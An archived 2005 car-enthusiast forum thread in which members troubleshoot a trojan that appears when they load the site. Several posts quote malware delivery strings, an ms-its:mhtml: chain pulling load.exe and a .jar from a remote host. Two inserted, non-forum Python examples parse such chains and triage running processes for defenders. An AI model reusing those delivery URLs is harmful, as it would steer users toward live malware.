Trojan on VF ? [Archive] - Volvo Performance Club UK Forums

nobananas
Wednesday 24th August 2005, 18:21
Last night when I opened vt5 it froze and my firewall detected: 'mshta.exe trying to make a connection'. I obviously didn't allow it and had to close Internet Explorer. I deleted the cookie and prefetch created by it and reconnected no problem. It did the same this morning and I wouldn't be too worried but then it happened on the missus' computer at work when she tried to access the site. Norton's didn't find anything, neither has any of my spyware scanning software and the I.T. bods at the missus' work ID'd it as a trojan. Anyone else found this? I managed to get on now by opening a saved favorite thread and logging on from it!

volvotuning
Wednesday 24th August 2005, 18:23
Yep same here. I got it too. See what J thinks, cos he may be on the case.

Adam.

nobananas
Wednesday 24th August 2005, 18:25
Glad it's not just me !

Justin
Wednesday 24th August 2005, 18:56
Hmmm, this is the 3rd incident, however, I can assure you there are no downloaders, popups, spyware etc attached to the site software, it cannot be hacked either.......

And judging by this its your pc's lads and lasses :(

http://www.nsclean.com/psc-htas.html

Removal here :

http://forum.theispguide.com/isp-ftopic3760.html

It will attach itself to the prefetch in your most opened IE applications, and run when they are launched, so we can see now who uses the site the most lol.

nobananas
Wednesday 24th August 2005, 19:02
Don't know if this is just a fluke but if you open the site via your favorites list it messes up. I managed to get on by opening a saved page then logged in then opened the home page, deleted vt5 from my favorites list and resaved it. It seems to work ok now. Any chance it could be the favorites entry that has been infected ?

Justin
Wednesday 24th August 2005, 19:08
Well the IT bods you mentioned are wrong, it is actually a Windows process, however when attacked by other trojans it activates in the way stated above, it could be attached to the cookie that is held for your favourites link, but deleting the link would not cure it.

Best thing to do is delete all cookies and temp internet files and just for good measure open command prompt and execute ipconfig /flushdns

Other than that i would make sure you have 100% up to date AV and firewall, a pop up blocker and spyware blaster or the like.

BTW, i can do a good deal on Anti Virus ;) lol

Matt30462
Wednesday 24th August 2005, 19:58
What is it with these people? Why would someone want to mess with ordinary home use PC's? I can understand those that hack into NATO's secrets or The Bank of England, but why infect Mr Smith or Mrs Jones and the kids. Sick Bastards the lot of 'em.

macV70R
Wednesday 24th August 2005, 20:08
My computer went dodgy last night & today on this site! I had to shut it down and restart??

Whats the score?

Mac

Kent Canary
Wednesday 24th August 2005, 20:10
Trojans..? Viruses..?

Hope its all resolved soon.

thedrill
Wednesday 24th August 2005, 20:14
I have had my antivirus come up with a message of ..VBS:Malware [Gen]..
so I quarantined it and the file is called:-win32mhtplo-24(Trj) which is some sort of trojan.
Im using avast antivirus pro, and it only picks it up when I go to the forum page . :wtf:

Andrew
Wednesday 24th August 2005, 20:16
It's very simple - they want to control your PC make it become a "zombie" to do a number of things primarily send spam and to be used in a distributed denial of service attack against a main target.

If you have a USB modem the average time to going onto the net and getting infected is down to just 12 minutes.

What can you do ?
Request a network / UTP modem from your ISP - you may have to pay but they are more secure.
Ensure you run windows update regularly.
Run virus scanners regularly and update your virus definitions daily
Run anti-spyware (adaware, spyware doctor and others) regularly.
Invest in a personal firewall - read the warnings it throws up.
Be careful about the attachments you run and save from email and untrusted websites.
backup your files to a non writeable source i.e. cdrom/dvd etc

It's a bad bad world out on the internet these days.

01c70t5
Wednesday 24th August 2005, 20:22
BTW, i can do a good deal on Anti Virus ;) lol
And there I was thinking AVG (http://www.grisoft.com/) is free :slap:

The Flying Banana
Wednesday 24th August 2005, 20:50
What is it with these people? Why would someone want to mess with ordinary home use PC's? I can understand those that hack into NATO's secrets or The Bank of England, but why infect Mr Smith or Mrs Jones and the kids. Sick Bastards the lot of 'em.

Notoriety is the main reason for all this kinda stuff. Don't know if you remember (some will never forget the hassle it caused!!!) but the virus called 'I Love You' which came in by e-mail was a major headache....these type of guys want to be caught cos with their level of computer literacy they are very valuable to people like Mr Gates and his Microsoft job and you will find people like Mr 'I Love You' virus working for Mr Gates for a VERY healthy sum and subsequent lifestyle!!!

Andrew
Wednesday 24th August 2005, 21:27
Notoriety is the main reason for all this kinda stuff. Don't know if you remember (some will never forget the hassle it caused!!!) but the virus called 'I Love You' which came in by e-mail was a major headache....these type of guys want to be caught cos with their level of computer literacy they are very valuable to people like Mr Gates and his Microsoft job and you will find people like Mr 'I Love You' virus working for Mr Gates for a VERY healthy sum and subsequent lifestyle!!!

Traditionally viruses have been kids at home going for the notoriety.... however more recently they've teamed up with organised crime (I kid you not) and they are finding more and more ways to combine viruses and trojans in order to zombie machines for spam or denial of service (DOS/DDOS).

The later is often for blackmail - several UK companies have been on the end of these in the last year.

More recently the trend is to install key loggers to steal personal information - credit cards, passwords, secret question answers, bank details. It's a massive business these days and is growing very very fast.

Watch out boys and girls.

MattB
Wednesday 24th August 2005, 22:02
I'm running AVG and Zone Alarm Pro Firewall.
Nothing detected as yet, but since yesterday morning, when I log on, site (and pc) is very slow - java platform is activated (never happened when using this site before) and pc freezes for almost 5 mins???

Justin
Wednesday 24th August 2005, 22:35
And there I was thinking AVG (http://www.grisoft.com/) is free :slap:

AVG is like having an umbrella instead of a roof, IMO :)

People, i will say it once more for the cheap seats, there is nothing on VF that would cause your machines to be infected.

MattB
Wednesday 24th August 2005, 22:44
AVG is like having an umbrella instead of a roof, IMO :)

People, i will say it once more for the cheap seats, there is nothing on VF that would cause your machines to be infected.

No problem J.

Incidently, what would you recommend to replace my AVG umbrella?

Justin
Wednesday 24th August 2005, 22:48
Lol, no offence intended mate, just from personal experience it's not too clever, there are loads on the market now as I'm sure you know, Norton is good enough for most but can be a pain if files get damaged, ie you can't uninstall or repair it, Panda is acclaimed to be good too, and cheapish, however Mr Cardwell is your man on this, i speak from a retail point of view, whereas Andrew deals with this for a living :)

craig
Wednesday 24th August 2005, 23:31
my pc has just started goin tits up the same and havnt a clue how to go about puttin it right

t5owner
Wednesday 24th August 2005, 23:45
Yippee i`m trojan free norton internet security and antivirus do it for me :haha:

:remybussi

Cheers

stuart

01c70t5
Thursday 25th August 2005, 09:29
AVG is like having an umbrella instead of a roof, IMO :)
Does that make windows the towel you mop the mess up with? :haha:

Never had a problem with AVG, providing it's kept up to date and used properly it's fine.

Justin
Thursday 25th August 2005, 09:33
Windows isnt even that good mate, glad AVG works for you ;)

chriskay
Thursday 25th August 2005, 09:42
I've been having problems too, although it's O.K. this morning. I'll try to explain, but I'm pretty thick about computers. When I log onto the site, the page opens correctly but the 'hourglass' is there & none of the buttons will respond, also, I can't close the page. After a while, a box comes up
"cannot find file ://\\abcdefgabcdefgabcdefg (continues for several lines) make sure the path is correct". This box won't close. Then another box appears on top of it "do you want to instal & run 'ms-its:mhtml:file://C:\foo.mht!http://stats4all.ws/fa/4a04ClropOAw5A/x.chm::/load.exe" Eventually, after a while, it lets me say 'no' to this & then I can close the previous box too. The site then behaves normally. The whole thing takes about 10 minutes. This only happens on this site. Is this the same sort of thing as others are getting?
Cheers, Chris.
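The prompt Chris quotes above chains three URL schemes together: an ms-its: (compiled HTML help) reference, an mhtml: web archive that points at a local stub file, and a remote .chm whose member path ends in an executable. A helper desk or a defender looking at user reports wants to pull those parts out of the text quickly rather than eyeball them. The following is an added example written for this thread, not code from the forum or from any of the posters; the regular expression assumes the exact shape shown in Chris's post (ms-its:mhtml:file://LOCAL!REMOTE::/MEMBER) and the sample prompts are constructed, with the remote address copied from the post.

```python
import re
from urllib.parse import urlsplit

# Constructed sample prompt texts, modelled on the dialog quoted in the thread (not captured from a machine).
SAMPLE_PROMPTS = [
    "do you want to instal & run 'ms-its:mhtml:file://C:\\foo.mht!"
    "http://stats4all.ws/fa/4a04ClropOAw5A/x.chm::/load.exe'",
    "Open file C:\\Users\\me\\Downloads\\manual.pdf?",
]

# Assumed layout: ms-its:mhtml:file://<local stub>!<remote .chm URL>::/<member inside the .chm>
MSITS_RE = re.compile(
    r"ms-its:mhtml:file://(?P<local>[^!']+)!(?P<remote>https?://[^'\s]+?)::/(?P<member>[^'\s]+)",
    re.IGNORECASE,
)

EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".bat", ".pif")


def parse_msits(text):
    """Return the components of an ms-its:mhtml: chain found in text, or None."""
    m = MSITS_RE.search(text)
    if not m:
        return None
    remote = m.group("remote")
    member = m.group("member")
    return {
        "local_stub": m.group("local"),          # local file the mhtml: part claims to open
        "remote_chm": remote,                    # where the .chm actually comes from
        "remote_host": urlsplit(remote).hostname,  # host to block / hunt for in proxy logs
        "payload": member,                       # file extracted from inside the .chm
        "executable": member.lower().endswith(EXECUTABLE_SUFFIXES),
    }


def triage_prompts(prompts):
    """Keep only prompts that resolve to a remote .chm carrying an executable member."""
    hits = []
    for text in prompts:
        parsed = parse_msits(text)
        if parsed and parsed["executable"]:
            hits.append(parsed)
    return hits


if __name__ == "__main__":
    for hit in triage_prompts(SAMPLE_PROMPTS):
        print(f"remote host {hit['remote_host']} delivers {hit['payload']} via {hit['remote_chm']}")
```

The useful output for a defender is the remote host and the member name: the host goes on a block list or into a proxy log search, and the member name is what to look for on disk.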

splatt
Thursday 25th August 2005, 09:47
I'm no expert but Chris...sounds like you have a PC with a virus or ad/spyware.

I have absolutely no problems.
I run Mcafee firewall/virus scan
Microsoft anti spyware
Lavasoft Ad aware
Spybot Search & Destroy
The last 3 are all free !!
Stop looking at dodgy websites all of you!! :)

t5owner
Thursday 25th August 2005, 10:55
I've been having problems too, although it's O.K. this morning. I'll try to explain, but I'm pretty thick about computers. When I log onto the site, the page opens correctly but the 'hourglass' is there & none of the buttons will respond, also, I can't close the page. After a while, a box comes up
"cannot find file ://\\abcdefgabcdefgabcdefg (continues for several lines) make sure the path is correct". This box won't close. Then another box appears on top of it "do you want to instal & run 'ms-its:mhtml:file://C:\foo.mht!http://stats4all.ws/fa/4a04ClropOAw5A/x.chm::/load.exe" Eventually, after a while, it lets me say 'no' to this & then I can close the previous box too. The site then behaves normally. The whole thing takes about 10 minutes. This only happens on this site. Is this the same sort of thing as others are getting?
Cheers, Chris.

Oh yes sounds like you got it bad
It would appear that the virus has infected the file that your pc uses to access the site and when the site sends back some info to your pc the virus kicks in and attempts to run (that's all the gobbledygook you're getting on your screen)
Looks like your gonna have to get some antivirus software but you may need to turn off the windows xp system restore capability first otherwise the virus will just reinstall its self after youv`e used the anti virus software
The same applies to anyone else also havin problems as if you dont turn off the system restore your antivirus cannot scan the files that have been backed up ready for a restore and this is often where the virus is hiding

Oh forgot to mention System Restore is only available to Windows 2000 and XP users i think i know its not on Windows 98 or 98 se

Oh and don`t forget to run in safe mode while your doin all the above as that stops the virus from hiding or trying to access the web while your tryin to get rid of it

Cheers

stuart

MattB
Thursday 25th August 2005, 12:32
Lol, no offence intended mate, just from personal experience its not too clever, there are loads on the market now as im sure you know, Norton is good enough for most but can be a pain if files get damaged, ie you cant uninstall or repair it, Panda is acclaimed to be good too, and cheapish, however Mr Cardwell is your man on this, i speak from a retail point of view, where as Andrew deals with this for a living :)

Thanks J :remybussi

I've been having problems too, although it's O.K. this morning. I'll try to explain, but I'm pretty thick about computers. When I log onto the site, the page opens correctly but the 'hourglass' is there & none of the buttons will respond, also, I can't close the page. After a while, the site then behaves normally. The whole thing takes about 10 minutes. This only happens on this site.

Same was happening to mine - again, pc/forum seems ok today. Zone Alarm Scans for ADware and Spyware Daily. I also used AdwareSE once a week, I have scanned with AVG twice this week now. Nothing has shown up. I'm puzzled.

Goof
Thursday 25th August 2005, 15:43
In my experience, there are a few things you should use to help keep your system clean:-

A decent Anti Virus (keep it updated too).
Use AdAware - it's a freebie.
Use SpyBot - another freebie.
- What AdAware misses, SpyBot detects (and vice-versa).

Do a scan of your "Documents and Settings" folder - don't just rely on a "System" or "C:" scan as some programs seem to not do a thorough scan of this folder.

I've had plenty of experience of trojans / viruses / hijacks, so if you need any advice send me a PM or email.
(I'm away for the Bank Hol w/end, back Mon eve).

TedBovis
Thursday 25th August 2005, 17:17
As already suggested somewhere else in the thread throw away your USB modems as they are dreadful with zero security and get something like this below....IMO ISPs that supply customers with those USB devices should be shot.

http://www.ebuyer.com/customer/products/index.html?rb=10162352766&action=c2hvd19wcm9kdWN0X292ZXJ2aWV3&product_uid=63775

Yes this is one of the cheapest at £20ish (not one of the best but ok) easy to configure and will give you some extra MUST HAVE security in the form of a NAT firewall and as its not running Windows its not going to get hacked as easily as a windowz box will. There are loads of other devices similar to this one going up in price.

Also it's worth running a second virus scan on your machine from time to time, I have Norton Antivirus 10 installed but also occasionally visit http://uk.trendmicro-europe.com/index_consumer.php
and run their Housecall which is a free virus scanner which is actually very good (all on-line). Oh and a defo scan using AdAware or similar is also a must, although Norton 10 did pick up a few things that AdAware missed :/

Oh and if you really want to scare yourselves and see just how open to the internet you are try visiting http://grc.com/ and run through the security details and especially ShieldsUP try this with and without your NAT firewall or zone alarm etc and see what EVERYONE on the internet can see.

chriskay
Thursday 25th August 2005, 17:26
Mine has behaved normally today; no problems. Still never happened on any other site. From all the posts, it all seems too technical for me, so I'm just going to see how it goes. I've got Trend anti-virus which I update daily, also AdAware. Must get Spybot.
Cheers, Chris.

nobananas
Thursday 25th August 2005, 21:13
Not being funny but since I deleted my vt5 favorites entry and logged on to vt5 and re entered it into my favorites list I'm no longer having any problems ! Might be worth a try.

MattB, mine was exactly the same, java initialised and everything froze !

MattB
Friday 26th August 2005, 11:32
Not being funny but since I deleted my vt5 favorites entry and logged on to vt5 and re entered it into my favorites list I'm no longer having any problems ! Might be worth a try.

MattB, mine was exactly the same, java initialised and everything froze !

mmm - strange.
Mine's been ok in the last couple of days. I'll keep my eye on it though...

nobananas
Friday 26th August 2005, 21:47
DAMMIT ! Did it again tonight, right after paying for something on ebay which was acting a bit strange and very slow which is a bit of a worry ! Right thats it, the whole lots goin' out the window :wallbash:

thedrill
Saturday 27th August 2005, 07:53
I'm still getting the VIRUS message when entering this site...strange.

Vikingxc
Saturday 27th August 2005, 07:57
Im running with norton internet security 2005 and i have had no problems so far.

nobananas
Saturday 27th August 2005, 16:43
Ran live update on Nortons 2005 and did system scan and it actually found something ! Deleted said thing but it still dropped a b*llock when I connected.

MattB
Monday 29th August 2005, 10:47
DAMMIT ! Did it again tonight, right after paying for something on ebay which was acting a bit strange and very slow which is a bit of a worry ! Right thats it, the whole lots goin' out the window :wallbash:

Java platform activated again today when I logged on to the site. (1st time since Friday). Did a system scan - nothing shown.

deerworrier
Thursday 1st September 2005, 08:43
for the last few days when i call up the forum page i am redirected to here: http://www . atspace . com/domain_names_basics.html

i put the extra spaces in just incase.

i have run adaware plus i operate using zone alarm, no damage just hijacks my link, changed it and i t still does it. any ideas?

mikej
Thursday 1st September 2005, 09:03
mine does the same, i use norton 2005, mcafee, carried out system scan several times, no infections wtf? is it, not much cop with pc's. :slap:

Justin
Thursday 1st September 2005, 09:49
Guys, there is so much crap on the net that does this to your pc its daft, they can get round AV software and get in in many ways, i would do several things.

Clear your cookies, if you dont know how ask, and delete all temp internet files, again ask. Then go here:

http://www.ravantivirus.com/scan/

I often use it in the shop to search for infected files on customer pc's, (as well as many other tricks) Use the link under the box that says

To continue without subscribing click here (http://www.ravantivirus.com/scan/indexie.php).

Then you will get a active x control to install, let it install and then click "SCAN MY PC"

This usually finds many that the others cant. If that doesnt do it i would back up all of your data and then format your drives, and when re installed "KEEP OFF THEM DODGY SITES" ;)

Matt30462
Thursday 1st September 2005, 20:07
Something's afoot, got an email today to my bt address. It had a welcome to Matt30462. This is the only place I use this identity.

GOB****ES

Justin
Thursday 1st September 2005, 20:28
Is there a problem Matt ?

Matt30462
Thursday 1st September 2005, 20:54
Minor hiccup Justin. Some Turks have invited me to view Wendy getting her clothes off via webcam. Quite an entertaining concept but sadly on this occasion I must decline.
The email used my VT5 log-in, I only use it on here in the format they addressed it, so by my Sherlock Holme-like powers of deduction I suggest we have a PC nasty in our midst.
Just running NAV now and will clean cookies and temps.

mikej
Thursday 1st September 2005, 21:20
Justin followed your advice mate and ran the antivirus and it found nowt! visited other sites during day with no probs but as soon as i entered this site my pc froze and internet explorer encountered a problem and shut down? i don't know what the hell is happening, i would add if i then reconnect and revisit the site all is well and i don't experience any probs, it only happens if i switch the pc off and then visit the site for the first time since reboot etc
any ideas???

Justin
Thursday 1st September 2005, 22:59
Ok, i dont know what the virus or trojan is but it is obviously using the large amount of cookies that are stored to operate with.

Thats how when you log back in the site informs you of the number of new posts etc, all done by cookies, Matt, some of your cookie headers will be matt30462@volvot5 so it would assume your name is as above, all i can say guys is look at the processes that are running when it occurs using ctrl alt delete and click the processes tab at the top, any you dont know just type exactly what appears like sais.exe into google and see what it says, it will give you a full description of that executable and if you find a virus look at the removal process and protection for future.

Other than that i cant help you unless you bring me your machine, its that simple. Theres like 7 or 8 people that have this problem and 150 users a day are logging in, get your machines sorted.
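Justin's advice above (look at the process list in Task Manager and look up any name you do not recognise) is easier to apply when you compare the list against a small baseline of what normally runs, and also check that a familiar name is running from its usual folder, since a trojan can call itself svchost.exe too. The following is an added example written for this thread, not code from the forum or from any poster: the process list is constructed (the names autoclk.exe and sais.exe are taken from posts in this thread), and the baseline folders assume the Windows XP layout where system binaries live under C:\WINDOWS\system32.

```python
# Constructed sample in the shape of a tasklist-style listing: (image name, PID, full path).
# Not a real capture; autoclk.exe and sais.exe are names mentioned in this thread.
SAMPLE_PROCESSES = [
    ("System", 4, ""),
    ("svchost.exe", 912, r"C:\WINDOWS\system32\svchost.exe"),
    ("explorer.exe", 1480, r"C:\WINDOWS\explorer.exe"),
    ("mshta.exe", 2044, r"C:\WINDOWS\system32\mshta.exe"),
    ("autoclk.exe", 2316, r"C:\WINDOWS\autoclk.exe"),
    ("sais.exe", 2410, r"C:\Documents and Settings\user\Local Settings\Temp\sais.exe"),
    ("svchost.exe", 2500, r"C:\Documents and Settings\user\Local Settings\Temp\svchost.exe"),
]

# Assumed baseline: image name -> folder it legitimately runs from (None = no path to check).
BASELINE = {
    "system": None,
    "svchost.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
    "mshta.exe": r"c:\windows\system32",
}


def folder_of(path):
    """Lower-cased parent folder of a Windows path ('' when there is no path)."""
    return path.lower().rsplit("\\", 1)[0] if "\\" in path else ""


def triage(processes, baseline=BASELINE):
    """Return (pid, name, reason) for every process that deserves a closer look."""
    findings = []
    for name, pid, path in processes:
        key = name.lower()
        if key not in baseline:
            findings.append((pid, name, "name not in baseline - look it up before trusting it"))
            continue
        expected = baseline[key]
        if expected is not None and folder_of(path) != expected:
            findings.append((pid, name, f"known name running from unexpected folder: {path}"))
    return findings


if __name__ == "__main__":
    for pid, name, reason in triage(SAMPLE_PROCESSES):
        print(f"PID {pid:5d}  {name:<14} {reason}")
```

A baseline like this is only as good as the machine it was taken from, so build it from a known-clean install rather than from the suspect PC; the point of the folder check is that the name alone proves nothing.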

mikej
Thursday 1st September 2005, 23:10
Ran the scan yet again and found this little **** :

c:\windows\autoclk.exe-trojan:/killReg.d

Manually wiped it, rebooted and tried again, same bloody thing! I'll have another go tomorrow.... :dunce:

Matt30462
Friday 2nd September 2005, 15:17
I don't care that much really.............took a peek at Emily's puppies and then wiped everything off the computer. Started from scratch with none of the usual crap and clutter. Laptop is going like a bloody rocket now. They can infect me every few months if they like, every time I wipe it it gets quicker.

Goof
Friday 2nd September 2005, 17:17
Emily who?

nobananas
Friday 2nd September 2005, 18:41
Zonealarm pops up 'mshta.exe trying to get a connection' when I try to enter the site through my favorites entry or by tapping in address. mshta.exe is apparently a legit windows application but can be hi-jacked for sinister means. Just for fun I allowed it once and it downloaded 'm00' application onto my desktop, no idea what it was but i've deleted it and I won't be doing that again ! Strangely enough if I connect to the 'weebl and bob' site from my favorites list then go to vf from there it's all ok !

Matt30462
Saturday 3rd September 2005, 10:57
Emily who?

Good point Goof. It was Wendy who wanted to show me her Turkish puppies........No wonder Emily got upset.

thedrill
Tuesday 6th September 2005, 18:13
This is the message I'm getting from my antivirus...

http://stats4all.ws/fa/yQwW5YzvgM1L_A/proc.jar\PxB22C\Jvb.class

Think it's a Java app...